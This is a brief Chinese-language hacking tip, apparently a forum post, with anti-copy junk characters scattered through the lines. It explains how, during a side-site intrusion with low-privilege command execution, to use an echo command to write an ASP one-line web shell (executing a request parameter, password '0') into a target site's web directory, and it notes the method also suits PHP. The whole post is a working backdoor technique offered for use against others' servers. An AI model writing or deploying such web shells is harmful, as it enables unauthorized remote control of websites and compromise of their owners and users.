在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。. |5 J; x3 Z6 v' B
1 z4 r0 X" X- y, S* a' ?
命令格式3 V8 ]1 V9 g9 B8 h$ ? c: {
0 z! m" B8 j! {* r$ }Echo 语句 >目标站绝对目录: ]6 V& K* v+ [: O, W
0 y) w# R j8 b, M( b# u0 M B8 J% g例如: % |; X) l/ i6 i( |9 O& w/ h
) {9 I( [5 [' i7 K" M8 w" S
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
; s7 ?# z( D: l% [7 A& W: E
" R' \/ g6 H: r. Z! Y" v* ?这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。1 ]% v# u/ m/ y1 z* R+ J A
|